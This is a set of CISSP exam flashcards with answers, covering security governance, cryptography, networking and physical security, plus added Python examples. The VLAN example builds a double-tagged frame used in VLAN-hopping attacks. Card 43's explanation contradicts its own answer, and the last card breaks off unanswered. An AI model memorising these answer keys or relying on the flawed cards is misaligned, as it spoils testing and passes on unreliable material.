Harris Exam Flashcards

1
Q

Which of the following standards would be most useful to you in ensuring your information security management system follows industry best practices?

A. NIST SP 800-53

B. Six Sigma

C. ISO/IEC 27000 series

D. COSO IC

A

C. The ISO/IEC 27000 series is the only option that addresses best practices across the breadth of an ISMS. COSO IC and NIST SP 800-53 both deal with controls, which are a critical but not the only component of an ISMS.

2
Q

OCTAVE, NIST SP 800-30, and AS/NZS ISO 31000 are different approaches to carrying out risk management within companies and organizations. What are the differences between these methods?

A. NIST SP 800-30 and OCTAVE are corporate based, while AS/NZS is international.

B. NIST SP 800-30 is IT based, while OCTAVE and AS/NZS ISO 31000 are corporate based.

C. AS/NZS is IT based, and OCTAVE and NIST SP 800-30 are assurance based.

D. NIST SP 800-30 and AS/NZS are corporate based, while OCTAVE is international.

A

B. NIST SP 800-30, Revision 1, “Guide for Conducting Risk Assessments,” is a U.S. federal standard that is focused on IT risks. OCTAVE is a methodology to set up a risk management program within an organizational structure. AS/NZS ISO 31000 takes a much broader approach to risk management. This methodology can be used to understand a company’s financial, capital, human safety, and business decisions risks. Although it can be used to analyze security risks, it was not created specifically for this purpose.

3
Q

A company has an e-commerce website that carries out 60 percent of its annual revenue. Under the current circumstances, the annualized loss expectancy for a website against the threat of attack is $92,000. After implementing a new application-layer firewall, the new annualized loss expectancy would be $30,000. The firewall costs $65,000 per year to implement and maintain.

Which of the following describes the company’s approach to risk management?

A. Risk transference

B. Risk avoidance

C. Risk acceptance

D. Risk mitigation

A

D. Risk mitigation involves employing controls to reduce the likelihood of an incident, the damage it causes, or both. The four ways of dealing with risk are accept, avoid, transfer, and mitigate (reduce). A firewall is a countermeasure installed to reduce the risk of a threat. The figures also let you judge the countermeasure's worth: value of control = (ALE before) - (ALE after) - (annual cost of control) = $92,000 - $30,000 - $65,000 = -$3,000, so on these numbers alone the firewall costs more than the risk it removes. That does not change the answer, because the question asks only which risk-handling strategy the company chose, not whether it was a good buy.

4
Q

The international standards bodies ISO and IEC developed a series of standards that are used in organizations around the world to implement and maintain information security management systems. The standards were derived from the British Standard 7799, which was broken down into two main pieces. Organizations can use this series of standards as guidelines, but can also be certified against them by accredited third parties.

Which of the following are incorrect mappings pertaining to the individual standards that make up the ISO/IEC 27000 series?

i. ISO/IEC 27001 outlines ISMS implementation guidelines, and ISO/IEC 27003 outlines the ISMS program’s requirements.
ii. ISO/IEC 27005 outlines the audit and certification guidance, and ISO/IEC 27002 outlines the metrics framework.
iii. ISO/IEC 27006 outlines the program implementation guidelines, and ISO/IEC 27005 outlines risk management guidelines.
iv. ISO/IEC 27001 outlines the code of practice, and ISO/IEC 27004 outlines the implementation framework.

A. i, iii

B. i, ii

C. ii, iii, iv

D. i, ii, iii, iv

A

D. All four mappings are wrong. Unfortunately, you will run into questions on the CISSP exam that are this confusing, so you need to be ready for them. The proper mappings for the ISO/IEC standards are as follows:

  • ISO/IEC 27001 ISMS requirements
  • ISO/IEC 27002 Code of practice for information security management
  • ISO/IEC 27003 Guideline for ISMS implementation
  • ISO/IEC 27004 Guideline for information security management measurement and metrics framework
  • ISO/IEC 27005 Guideline for information security risk management
  • ISO/IEC 27006 Guidance for bodies providing audit and certification of information security management systems.
5
Q

Todd wants to be able to prevent fraud from taking place, but he knows that some people may get around the types of controls he puts into place. In those situations he wants to be able to identify when an employee is doing something suspicious.

Which of the following incorrectly describes what Todd is implementing in this scenario and what those specific controls provide?

A. Separation of duties by ensuring that a supervisor must approve the cashing of a check over $3,500. This is an administrative control that provides preventive protection for Todd’s organization.

B. Rotation of duties by ensuring that one employee only stays in one position for up to three months at a time. This is an administrative control that provides detective capabilities.

C. Security awareness training, which is a preventive administrative control that can also emphasize enforcement.

D. Dual control, which is an administrative detective control that can ensure that two employees must carry out a task simultaneously.

A

D. Dual control is an administrative preventive control. It ensures that two people must carry out a task at the same time, as in two people having separate keys when opening the vault. It is not a detective control. Notice that the question asks what Todd is not doing. Remember that on the exam you need to choose the best answer. In many situations you will not like the question or the corresponding answers on the CISSP exam, so prepare yourself. The questions can be tricky, which is one reason why the exam itself is so difficult.

6
Q

The term used to denote a potential cause of an unwanted incident, which may result in harm to a system or organization is

A. Vulnerability

B. Exploit

C. Threat

D. Attacker

A

C. The question provides the definition of a threat in ISO/IEC 27000. The term attacker (option D) could be used to describe a threat agent that is, in turn, a threat, but use of this term is much more restrictive. The best answer is a threat.

7
Q

Which of the following has an incorrect definition mapping?

i. Civil (code) law: Based on previous interpretations of laws
ii. Common law: Rule-based law, not precedent-based
iii. Customary law: Deals mainly with personal conduct and patterns of behavior
iv. Religious law: Based on religious beliefs of the region

A. i, iii

B. i, ii, iii

C. i, ii

D. iv

A

C. The following has the proper definition mappings:

i. Civil (code) law: Rule-based law, not precedent-based
ii. Common law: Based on previous interpretations of laws
iii. Customary law: Deals mainly with personal conduct and patterns of behavior
iv. Religious law: Based on religious beliefs of the region

8
Q

The effect of data aggregation on classification levels is best described by which of the following?

A. Data classification standards apply to all the data within an organization.

B. Aggregation is a disaster recovery technique with no effect on classification.

C. A low-classification aggregation of data can be deconstructed into higher-classification data items.

D. Items of low-classification data combine to create a higher-classification set.

A

D. Data aggregation can become a classification issue whenever someone can combine data items and end up with a higher-classification aggregate. For instance, a person’s name, address, phone number, or date of birth are normally not PII by themselves. However, when combined, they do become PII under the definition of most jurisdictions with applicable laws.

9
Q

The data owner is most often described by all of the following except

A. Manager in charge of a business unit

B. Ultimately responsible for the protection of the data

C. Financially liable for the loss of the data

D. Ultimately responsible for the use of the data

A

C. The data owner is the manager in charge of a specific business unit, and is ultimately responsible for the protection and use of a specific subset of information. In most situations, this person is not financially liable for the loss of his or her data.

10
Q

If different user groups with different security access levels need to access the same information, which of the following actions should management take?

A. Decrease the security level on the information to ensure accessibility and usability of the information.

B. Require specific written approval each time an individual needs to access the information.

C. Increase the security controls on the information.

D. Decrease the classification label on the information.

A

C. If data is going to be available to a wide range of people, more granular security should be implemented to ensure that only the necessary people access the data and that the operations they carry out are controlled. The security implemented can come in the form of authentication and authorization technologies, encryption, and specific access control mechanisms.

11
Q

Who is ultimately responsible for making sure data is classified and protected?

A. Data owners

B. Users

C. Administrators

D. Management

A

D. The key to this question is the use of the word “ultimately.” Though management can delegate tasks to others, it is ultimately responsible for everything that takes place within a company. Therefore, it must continually ensure that data and resources are being properly protected.

12
Q

Which of the following is not addressed by the data retention policy?

A. What data to keep

B. For whom data is kept

C. How long data is kept

D. Where data is kept

A

B. The data retention policy should address what data to keep, where to keep it, how to store it, and for how long to keep it. The policy is not concerned with “for whom” the data is kept.

13
Q

What is the final step in authorizing a system for use in an environment?

A. Certification

B. Security evaluation and rating

C. Accreditation

D. Verification

A

C. Certification is a technical review of a product, and accreditation is management’s formal approval of the findings of the certification process. This question asked you which step was the final step in authorizing a system before it is used in an environment, and that is what accreditation is all about.

14
Q

What feature enables code to be executed without the usual security checks?

A. Temporal isolation

B. Maintenance hook

C. Race conditions

D. Process multiplexing

A

B. Maintenance hooks get around the system’s or application’s security and access control checks by allowing whoever knows the key sequence to access the application and most likely its code. Maintenance hooks should be removed from any code before it gets into production.

15
Q

If a component fails, a system should be designed to do which of the following?

A. Change to a protected execution domain

B. Change to a problem state

C. Change to a more secure state

D. Release all data held in volatile memory

A

C. The state machine model dictates that a system should start up securely, carry out secure state transitions, and even fail securely. This means that if the system encounters something it deems unsafe, it should change to a more secure state for self-preservation and protection.

16
Q

In secure computing systems, why is there a logical form of separation used between processes?

A. Processes are contained within their own security domains so each does not make unauthorized accesses to other processes or their resources.

B. Processes are contained within their own security perimeter so they can only access protection levels above them.

C. Processes are contained within their own security perimeter so they can only access protection levels equal to them.

D. The separation is hardware and not logical in nature.

A

A. Processes are assigned their own variables, system resources, and memory segments, which make up their domain. This is done so they do not corrupt each other’s data or processing activities.

17
Q

Pete is a new security manager at a financial institution that develops its own internal software for specific proprietary functionality. The financial institution has several locations distributed throughout the world and has bought several individual companies over the last ten years, each with its own heterogeneous environment. Since each purchased company had its own unique environment, it has been difficult to develop and deploy internally developed software in an effective manner that meets all the necessary business unit requirements. Which of the following best describes a standard that Pete should ensure the software development team starts to implement so that various business needs can be met?

A. ISO/IEC/IEEE 42010

B. Common Criteria

C. ISO/IEC 43010

D. ISO/IEC 15408

A

A. ISO/IEC/IEEE 42010 is an international standard for architecture description of systems and software: it specifies how architecture frameworks, architecture description languages, and viewpoints are defined and documented. Following it lets a system be developed in a manner that addresses the concerns of all of its stakeholders, which is exactly Pete's problem across heterogeneous business units. Common Criteria and ISO/IEC 15408 are the same thing, a standard for evaluating the security of products, not a framework for developing software that meets business needs.

18
Q

Which of the following is an incorrect description pertaining to the common components that make up computer systems?

i. General registers are commonly used to hold temporary processing data, while special registers are used to hold process-characteristic data as in condition bits.
ii. A processor sends a memory address and a “read” request down an address bus and a memory address and a “write” request down an I/O bus.
iii. Process-to-process communication commonly takes place through memory stacks, which are made up of individually addressed buffer locations.
iv. A CPU uses a stack return pointer to keep track of the next instruction sets it needs to process.

A. i

B. i, ii

C. ii, iii

D. ii, iv

A

D. Statements ii and iv are incorrect. A processor sends a memory address and a “read” request down the address bus; the memory system then places the requested data on the data bus. A “write” request travels over the same address and data buses, not an I/O bus, which is used by peripheral devices. A CPU uses a program counter, not a stack pointer, to keep track of the memory address of the next instruction it needs to process in sequence; a stack pointer is a component used within memory stack communication processes.

19
Q

Mark is a security administrator who is responsible for purchasing new computer systems for a co-location facility his company is starting up. The company has several time-sensitive applications that require extensive processing capabilities. The co-location facility is not as large as the main facility, so it can only fit a smaller number of computers, which still must carry the same processing load as the systems in the main building. Which of the following best describes the most important aspects of the products Mark needs to purchase for these purposes?

A. Systems must provide symmetric multiprocessing capabilities and virtualized environments.

B. Systems must provide asymmetric multiprocessing capabilities and virtualized environments.

C. Systems must provide multiprogramming multiprocessing capabilities and virtualized environments.

D. Systems must provide multiprogramming multiprocessing capabilities and symmetric multiprocessing environments.

A

B. When systems provide asymmetric multiprocessing, this means multiple CPUs can be used for processing. Asymmetric indicates the capability of assigning specific applications to one CPU so that they do not have to share computing capabilities with other competing processes, which increases performance. Since a smaller number of computers can fit in the new location, virtualization should be deployed to allow for several different systems to share the same physical computer platforms.

20
Q

Which of the following best describes an item the software development team needs to address to ensure that drivers cannot be loaded in an unauthorized manner?

A. Improved security kernel processes

B. Improved security perimeter processes

C. Improved application programming interface processes

D. Improved garbage collection processes

A

A. If device drivers can be loaded improperly, then either the access control rules outlined within the reference monitor need to be improved upon or the current rules need to be better enforced through the security kernel processes. Only authorized subjects should be able to install sensitive software components that run within ring 0 of a system.

21
Q

John has been told that one of the applications installed on a web server within the DMZ accepts any length of information that a customer using a web browser inputs into the form the web server provides to collect new customer data. Which of the following describes an issue that John should be aware of pertaining to this type of vulnerability?

A. Application is written in the C programming language.

B. Application is not carrying out enforcement of the trusted computing base.

C. Application is running in ring 3 of a ring-based architecture.

D. Application is not interacting with the memory manager properly.

A

A. The C language is susceptible to buffer overflow attacks because it allows direct pointer manipulation and performs no bounds checking of its own: standard library functions such as gets() and strcpy() copy input into a fixed-size buffer until they see a terminator, however long the input is. An application that accepts unlimited-length form input and stores it in such a buffer lets an attacker overwrite adjacent memory. The fix is to validate and bound the input length (and use the length-limited library variants) before the copy takes place.

22
Q

Which option best describes the difference between HMAC and CBC-MAC?

A. HMAC creates a message digest and is used for integrity; CBC-MAC is used to encrypt blocks of data for confidentiality.

B. HMAC uses a symmetric key and a hashing algorithm; CBC-MAC uses the first block for the checksum.

C. HMAC provides integrity and data origin authentication; CBC-MAC uses a block cipher for the process of creating a MAC.

D. HMAC encrypts a message with a symmetric key and then puts the result through a hashing algorithm; CBC-MAC encrypts the whole message.

A

C. In an HMAC operation, a symmetric key is combined with the message and the result is put through a hashing algorithm (strictly, the key is XORed with two fixed padding constants and the hash is applied twice in a nested construction, as specified in RFC 2104). Because only holders of the key can produce the correct value, HMAC provides integrity and system or data origin authentication. CBC-MAC instead runs the message through a block cipher in CBC mode and uses the last block of ciphertext as the MAC. A caveat for practitioners: plain CBC-MAC is only secure for messages of one fixed length; CMAC is the standardized variant that closes that gap.

23
Q

What is an advantage of RSA over DSA?

A. It can provide digital signature and encryption functionality.

B. It uses fewer resources and encrypts faster because it uses symmetric keys.

C. It is a block cipher rather than a stream cipher.

D. It employs a one-time encryption pad.

A

A. RSA can be used for data encryption, key exchange, and digital signatures. DSA can be used only for digital signatures.

24
Q

What is used to create a digital signature?

A. The receiver’s private key

B. The sender’s public key

C. The sender’s private key

D. The receiver’s public key

A

C. A digital signature is a message digest that has been encrypted with the sender’s private key; anyone holding the sender’s public key can decrypt it and compare the result with a fresh digest of the message. A sender, or anyone else, should never have access to the receiver’s private key.

25
Q

Why would a certificate authority revoke a certificate?

A. If the user’s public key has become compromised

B. If the user changed over to using the PEM model that uses a web of trust

C. If the user’s private key has become compromised

D. If the user moved to a new location

A

C. The reason a certificate is revoked is to warn others who use that person’s public key that they should no longer trust the public key because, for some reason, that public key is no longer bound to that particular individual’s identity. This could be because an employee left the company or changed his name and needed a new certificate, but most likely it is because the person’s private key was compromised.

26
Q

What does DEA stand for?

A. Data Encoding Algorithm

B. Data Encoding Application

C. Data Encryption Algorithm

D. Digital Encryption Algorithm

A

C. DEA (Data Encryption Algorithm) is the algorithm that fulfilled the DES standard, so DEA has all of the attributes of DES: a symmetric block cipher that uses 64-bit blocks, 16 rounds, and a 56-bit effective key (the key is supplied as 64 bits, of which 8 are parity bits).

27
Q

Who was involved in developing the first public key algorithm?

A. Adi Shamir

B. Ross Anderson

C. Bruce Schneier

D. Martin Hellman

A

D. The first released public key cryptography algorithm was developed by Whitfield Diffie and Martin Hellman.

28
Q

DES performs how many rounds of transposition/permutation and substitution?

A. 16

B. 32

C. 64

D. 56

A

A. DES carries out 16 rounds of mathematical computation on each 64-bit block of data it is responsible for encrypting. A round is a set of mathematical formulas used for encryption and decryption processes.

29
Q

If different keys generate the same ciphertext for the same message, what is this called?

A. Collision

B. Secure hashing

C. MAC

D. Key clustering

A

D. Message A was encrypted with key A and the result is ciphertext Y. If that same message A were encrypted with key B, the result should not be ciphertext Y. The ciphertext should be different because a different key was used. But if the ciphertext is the same, this occurrence is referred to as key clustering.

30
Q

What is the definition of an algorithm’s work factor?

A. The time it takes to encrypt and decrypt the same plaintext

B. The time it takes to break the encryption

C. The time it takes to implement 16 rounds of computation

D. The time it takes to apply substitution functions

A

B. The work factor of a cryptosystem is the amount of time and resources necessary to break the cryptosystem or its encryption process. The goal is to make the work factor so high that an attacker could not be successful in breaking the algorithm or cryptosystem.

31
Q

Which of the following is based on the fact that it is hard to factor large numbers into two original prime numbers?

A. ECC

B. RSA

C. DES

D. Diffie-Hellman

A

B. The RSA algorithm’s security is based on the difficulty of factoring a large number into the two original prime numbers. Multiplying the primes is a one-way function: it is easy to calculate the product, but infeasible to recover the primes from a product of sufficient size. Diffie-Hellman and ECC rely instead on the discrete logarithm problem, and DES is a symmetric cipher with no such mathematical basis.

32
Q

Which of the following describes the difference between the Data Encryption Standard and the Rivest-Shamir-Adleman algorithm?

A. DES is symmetric, while RSA is asymmetric.

B. DES is asymmetric, while RSA is symmetric.

C. They are hashing algorithms, but RSA produces a 160-bit hashing value.

D. DES creates public and private keys, while RSA encrypts messages.

A

A. DES is a symmetric algorithm: the same secret key encrypts and decrypts. RSA is an asymmetric algorithm that uses a public/private key pair, with one key of the pair reversing what the other does; it is used for encryption, key exchange, and digital signatures.
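As an added worked example for cards 23, 24, 31 and 32 (this is editor-supplied Python, not code from the Harris guide), the following textbook RSA shows the points those cards make: a key pair is derived from two primes, a signature is the message digest raised to the sender's private exponent and checked with the public exponent, the same key pair also encrypts and decrypts, and knowing one factor of n hands over the private key. The primes, message and function names are constructed for the demonstration; the digest is reduced mod n and no padding is applied, which is fine for illustrating the math but insecure in practice.

```python
import hashlib
from math import gcd

# Constructed demo primes (the Mersenne primes 2**31-1 and 2**61-1). A real RSA
# modulus is at least 2048 bits; these are only large enough to show the math.
P = 2**31 - 1
Q = 2**61 - 1
MESSAGE = b"constructed sample message: pay 100 to account 42"


def rsa_keygen(p: int, q: int, e: int = 65537):
    """Return ((n, e), (n, d)). Security rests on n being hard to factor."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)  # modular inverse of e (Python 3.8+)
    return (n, e), (n, d)


def _digest_as_int(message: bytes, n: int) -> int:
    # Textbook demo: the SHA-256 digest is reduced mod n. Real implementations
    # pad the digest (PKCS#1 v1.5 or PSS) and never use a modulus this small.
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(private_key, message: bytes) -> int:
    """Digital signature: hash the message, then apply the SENDER's private key."""
    n, d = private_key
    return pow(_digest_as_int(message, n), d, n)


def verify(public_key, message: bytes, signature: int) -> bool:
    """Anyone holding the sender's public key can check the signature."""
    n, e = public_key
    return pow(signature, e, n) == _digest_as_int(message, n)


def encrypt(public_key, plaintext_int: int) -> int:
    """RSA can also encrypt, with the RECEIVER's public key; DSA cannot."""
    n, e = public_key
    if not 0 <= plaintext_int < n:
        raise ValueError("plaintext must be an integer smaller than n")
    return pow(plaintext_int, e, n)


def decrypt(private_key, ciphertext_int: int) -> int:
    n, d = private_key
    return pow(ciphertext_int, d, n)


def private_exponent_from_factor(public_key, p: int) -> int:
    """Why factoring matters: one prime factor of n is enough to rebuild d."""
    n, e = public_key
    q, remainder = divmod(n, p)
    if remainder != 0:
        raise ValueError("p does not divide n")
    return pow(e, -1, (p - 1) * (q - 1))


PUBLIC_KEY, PRIVATE_KEY = rsa_keygen(P, Q)

if __name__ == "__main__":
    sig = sign(PRIVATE_KEY, MESSAGE)
    print("signature valid:", verify(PUBLIC_KEY, MESSAGE, sig))
    print("tampered valid: ", verify(PUBLIC_KEY, MESSAGE + b"!", sig))
    print("round trip ok:  ", decrypt(PRIVATE_KEY, encrypt(PUBLIC_KEY, 4242)) == 4242)
    print("d from factor:  ", private_exponent_from_factor(PUBLIC_KEY, P) == PRIVATE_KEY[1])
```

Note which key does what: signing uses the sender's private key and is checked with the sender's public key, while encryption uses the receiver's public key and is undone with the receiver's private key.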

33
Q

Which of the following uses a symmetric key and a hashing algorithm?

A. HMAC

B. Triple-DES

C. ISAKMP-OAKLEY

D. RSA

A

A. When an HMAC function is used, a symmetric key is combined with the message, and then that result is put through a hashing algorithm. The result is an HMAC value. HMAC provides data origin authentication and data integrity. Triple-DES is a symmetric cipher, RSA is an asymmetric algorithm, and ISAKMP-OAKLEY is a key management and exchange framework; none of them combines a key with a hash function in this way.
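Added example for cards 22 and 33 (editor-supplied Python, not from the original page): HMAC-SHA256 built from the bare hash function exactly as RFC 2104 specifies, cross-checked against Python's hmac module, with a constant-time verification step. The key and message are constructed sample values; CBC-MAC is not shown because it needs a block cipher that the standard library does not provide.

```python
import hashlib
import hmac

BLOCK_SIZE = 64  # SHA-256 compresses 64-byte blocks; HMAC pads the key to this size
KEY = b"constructed-demo-key"
SAMPLE_MESSAGE = b"constructed sample message: transfer 100 to account 42"


def hmac_sha256(key: bytes, message: bytes) -> bytes:
    """HMAC as defined in RFC 2104: H((K ^ opad) || H((K ^ ipad) || message))."""
    if len(key) > BLOCK_SIZE:               # a key longer than one block is hashed first
        key = hashlib.sha256(key).digest()
    key = key.ljust(BLOCK_SIZE, b"\x00")    # a shorter key is zero-padded to the block size
    inner_key = bytes(b ^ 0x36 for b in key)  # ipad
    outer_key = bytes(b ^ 0x5C for b in key)  # opad
    inner_hash = hashlib.sha256(inner_key + message).digest()
    return hashlib.sha256(outer_key + inner_hash).digest()


def verify_tag(key: bytes, message: bytes, tag: bytes) -> bool:
    """Data origin authentication and integrity: only a holder of the key can
    produce a matching tag, and any change to the message breaks the match."""
    # compare_digest runs in constant time, so timing does not reveal how many
    # leading bytes of a forged tag happened to be correct.
    return hmac.compare_digest(hmac_sha256(key, message), tag)


def matches_stdlib(key: bytes, message: bytes) -> bool:
    """Cross-check the hand-rolled construction against the standard library."""
    return hmac_sha256(key, message) == hmac.new(key, message, hashlib.sha256).digest()


if __name__ == "__main__":
    tag = hmac_sha256(KEY, SAMPLE_MESSAGE)
    print("tag:", tag.hex())
    print("matches stdlib:", matches_stdlib(KEY, SAMPLE_MESSAGE))
    print("tampered message accepted:", verify_tag(KEY, SAMPLE_MESSAGE + b"0", tag))
```

The two nested hashes are what distinguish HMAC from the naive H(key || message); the inner and outer keys differ because of the two padding constants.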

34
Q

The generation of keys that are made up of random values is referred to as Key Derivation Functions (KDFs). What values are not commonly used in this key generation process?

A. Hashing values

B. Asymmetric values

C. Salts

D. Passwords

A

B. Asymmetric (public/private key) values are not an input to a KDF. A KDF takes a secret such as a password or master key, usually combined with a salt, and runs it through a hash or HMAC function for a specified number of rounds dictated by the algorithm to produce key material. The salt makes identical passwords derive different keys, and the round (iteration) count slows down brute-force guessing.
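Added example (editor-supplied Python, not from the original page) of the KDF inputs this card lists, using PBKDF2-HMAC-SHA256 from Python's standard library: a password and a random salt go through a hash-based function for a chosen number of rounds to produce key material, and the same derivation is used to check a password later. The sample password, the parameter values and the function names are assumptions for the demonstration; no asymmetric values appear anywhere.

```python
import hashlib
import hmac
import secrets

HASH_NAME = "sha256"
ITERATIONS = 600_000        # rounds; raise until one derivation takes ~100 ms on your hardware
KEY_LENGTH = 32             # bytes of derived key, e.g. an AES-256 key
SAMPLE_PASSWORD = b"correct horse battery staple"   # constructed sample value


def derive_key(password: bytes, salt: bytes,
               iterations: int = ITERATIONS, length: int = KEY_LENGTH) -> bytes:
    """PBKDF2-HMAC: hash function + password + salt + rounds -> key material."""
    return hashlib.pbkdf2_hmac(HASH_NAME, password, salt, iterations, dklen=length)


def new_credential(password: bytes, iterations: int = ITERATIONS):
    """What to store for a user: (salt, iterations, derived key), never the password."""
    salt = secrets.token_bytes(16)  # fresh random salt per credential
    return salt, iterations, derive_key(password, salt, iterations)


def check_password(candidate: bytes, salt: bytes, iterations: int, stored_key: bytes) -> bool:
    """Re-derive with the stored salt and rounds, then compare in constant time."""
    derived = derive_key(candidate, salt, iterations, len(stored_key))
    return hmac.compare_digest(derived, stored_key)


if __name__ == "__main__":
    salt, rounds, key = new_credential(SAMPLE_PASSWORD)
    print("salt:", salt.hex(), "rounds:", rounds, "key:", key.hex())
    print("same password, other salt differs:",
          derive_key(SAMPLE_PASSWORD, b"other-salt", rounds) != key)
    print("check ok:", check_password(SAMPLE_PASSWORD, salt, rounds, key))
```

Store the salt and the iteration count next to the derived key; both are needed to re-derive it, and neither needs to be secret.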

35
Q

When should a Class C fire extinguisher be used instead of a Class A fire extinguisher?

A. When electrical equipment is on fire

B. When wood and paper are on fire

C. When a combustible liquid is on fire

D. When the fire is in an open area

A

A. A Class C fire is an electrical fire, so an extinguisher with a suppression agent that does not conduct electricity (a gas such as CO2, or a dry chemical) should be used; the water-based agents of a Class A extinguisher must never be sprayed on energized equipment. Burning wood and paper are a Class A fire, and a burning combustible liquid is a Class B fire.

36
Q

Which of the following answers contains a category of controls that does not belong in a physical security program?

A. Deterrence and delaying

B. Response and detection

C. Assessment and detection

D. Delaying and lighting

A

D. The categories of controls that should make up any physical security program are deterrence, delaying, detection, assessment, and response. Lighting is a control itself, not a category of controls.

37
Q

How does TKIP provide more protection for WLAN environments?

A. It uses the AES algorithm.

B. It decreases the IV size and uses the AES algorithm.

C. It adds more keying material.

D. It uses MAC and IP filtering.

A

C. TKIP works on top of WEP’s RC4 stream cipher by feeding it fresh keying material, that is, data used to generate the per-packet keystream. It increases the IV from 24 to 48 bits, mixes the sender’s MAC address and the IV into the per-packet key so that every packet is encrypted under a different key, and adds the Michael message integrity check. It does not use AES; that arrived with CCMP in WPA2.

38
Q

Which of the following is not a characteristic of the IEEE 802.11a standard?

A. It works in the 5-GHz range.

B. It uses the OFDM spread spectrum technology.

C. It provides 52 Mbps in bandwidth.

D. It covers a smaller distance than 802.11b.

A

C. The IEEE standard 802.11a uses the OFDM spread spectrum technology, works in the 5-GHz frequency band, and provides bandwidth of up to 54 Mbps. The operating range is smaller because it works at a higher frequency.

39
Q

Which of the following can take place if an attacker can insert tagging values into network- and switch-based protocols with the goal of manipulating traffic at the data link layer?

A. Open relay manipulation

B. VLAN hopping attack

C. Hypervisor denial-of-service attack

D. Smurf attack

A

B. VLAN hopping attacks allow attackers to gain access to traffic in VLAN segments they are not assigned to. In switch spoofing, the attacker’s system acts as though it is a switch: it speaks the trunking and negotiation protocols in use, negotiates a trunk, and can then see traffic from every VLAN carried on it. In double tagging, the attacker prepends two 802.1Q tags to a frame; the first switch strips the outer tag (matching the trunk’s native VLAN) and the next switch forwards the frame into the VLAN named by the inner tag. Both manipulate control of traffic at the data link layer. The usual defenses are to disable trunk negotiation on user-facing ports, configure them as access ports, and use an otherwise unused VLAN as the native VLAN on trunks.
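Added example (editor-supplied Python, not from the original page) showing what “inserting tagging values” looks like on the wire: a builder that stacks 802.1Q tags on an Ethernet frame, a parser that walks the tag stack, and two checks a monitoring point or switch could apply to frames arriving from an end host. The MAC addresses and VLAN IDs are constructed sample values.

```python
import struct

TPID_8021Q = 0x8100     # customer VLAN tag
TPID_8021AD = 0x88A8    # service-provider (Q-in-Q) outer tag
ETHERTYPE_IPV4 = 0x0800

# Constructed sample addresses (locally administered, not real hosts).
DST_MAC = bytes.fromhex("ffffffffffff")
SRC_MAC = bytes.fromhex("0200deadbeef")


def build_frame(dst: bytes, src: bytes, vids, ethertype: int = ETHERTYPE_IPV4,
                payload: bytes = b"\x00" * 46) -> bytes:
    """Build an Ethernet frame carrying zero or more 802.1Q tags, outermost first.
    Each tag is TPID (2 bytes) + TCI (2 bytes: 3-bit PCP, 1-bit DEI, 12-bit VID)."""
    frame = bytearray(dst + src)
    for vid in vids:
        if not 0 <= vid <= 4095:
            raise ValueError("VLAN ID must fit in 12 bits")
        frame += struct.pack("!HH", TPID_8021Q, vid)   # PCP and DEI left at 0
    frame += struct.pack("!H", ethertype) + payload
    return bytes(frame)


def parse_vlan_tags(frame: bytes):
    """Walk the tag stack after the two MAC addresses; return (vids, inner ethertype)."""
    if len(frame) < 14:
        raise ValueError("truncated frame")
    offset = 12
    vids = []
    while True:
        (ethertype,) = struct.unpack_from("!H", frame, offset)
        if ethertype not in (TPID_8021Q, TPID_8021AD):
            return vids, ethertype
        if len(frame) < offset + 6:
            raise ValueError("truncated VLAN tag")
        (tci,) = struct.unpack_from("!H", frame, offset + 2)
        vids.append(tci & 0x0FFF)   # low 12 bits of the TCI are the VLAN ID
        offset += 4


def is_double_tagged(frame: bytes) -> bool:
    """Two or more stacked tags from a host is the classic VLAN-hopping signature."""
    vids, _ = parse_vlan_tags(frame)
    return len(vids) >= 2


def is_suspicious_on_access_port(frame: bytes) -> bool:
    """An end host on an access port has no business sending any tagged frame."""
    vids, _ = parse_vlan_tags(frame)
    return len(vids) >= 1


if __name__ == "__main__":
    attack = build_frame(DST_MAC, SRC_MAC, [1, 99])   # outer tag = native VLAN 1, inner = target 99
    print("tags:", parse_vlan_tags(attack))
    print("double tagged:", is_double_tagged(attack))
    print("suspicious on access port:", is_suspicious_on_access_port(attack))
```

A switch that strips the outer tag leaves exactly the inner tag in place, which is why the parser's view of the stack matters at each hop.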

40
Q

Which of the following proxies cannot make access decisions based upon protocol commands?

A. Application

B. Packet filtering

C. Circuit

D. Stateful

A

C. Application and circuit are the only types of proxy-based firewall solutions listed here. The others do not use proxies. Circuit-based proxy firewalls make decisions based on header information, not the protocol’s command structure. Application-based proxies are the only ones that understand this level of granularity about the individual protocols.

41
Q

Which of the following is a bridge-mode technology that can monitor individual traffic links between virtual machines or can be integrated within a hypervisor component?

A. Orthogonal frequency division

B. Unified threat management modem

C. Virtual firewall

D. Internet Security Association and Key Management Protocol

A

C. Virtual firewalls can be bridge-mode products, which monitor individual traffic links between virtual machines, or they can be integrated within the hypervisor. The hypervisor is the software component that carries out virtual machine management and oversees guest system software execution. If the firewall is embedded within the hypervisor, then it can “see” and monitor all the activities taking place within the one system.

42
Q

Metro Ethernet is a MAN protocol that can work in network infrastructures made up of access, aggregation, metro, and core layers. Which of the following best describes these network infrastructure layers?

A. The access layer connects the customer’s equipment to a service provider’s aggregation network. Aggregation occurs on a core network. The metro layer is the metropolitan area network. The core connects different metro networks.

B. The access layer connects the customer’s equipment to a service provider’s core network. Aggregation occurs on a distribution network at the core. The metro layer is the metropolitan area network.

C. The access layer connects the customer’s equipment to a service provider’s aggregation network. Aggregation occurs on a distribution network. The metro layer is the metropolitan area network. The core connects different access layers.

D. The access layer connects the customer’s equipment to a service provider’s aggregation network. Aggregation occurs on a distribution network. The metro layer is the metropolitan area network. The core connects different metro networks.

A

D. The access layer connects the customer’s equipment to a service provider’s aggregation network. Aggregation occurs on a distribution network. The metro layer is the metropolitan area network. The core connects different metro networks.

43
Q

Which of the following provides an incorrect definition of the specific component or protocol that makes up IPSec?

A. Authentication Header protocol provides data integrity, data origin authentication, and protection from replay attacks.

B. Encapsulating Security Payload protocol provides confidentiality, data origin authentication, and data integrity.

C. Internet Security Association and Key Management Protocol provides a framework for security association creation and key exchange.

D. Internet Key Exchange provides authenticated keying material for use with encryption algorithms.

A

D. Authentication Header protocol provides data integrity, data origin authentication, and protection from replay attacks. Encapsulating Security Payload protocol provides confidentiality, data origin authentication, and data integrity. Internet Security Association and Key Management Protocol provides a framework for security association creation and key exchange. Internet Key Exchange provides authenticated keying material for use with ISAKMP.

44
Q

Which of the following is not a characteristic of the Protected Extensible Authentication Protocol?

A. Authentication protocol used in wireless networks and point-to-point connections

B. Designed to provide authentication for 802.11 WLANs

C. Designed to support 802.1X port access control and Transport Layer Security

D. Designed to support password-protected connections

A

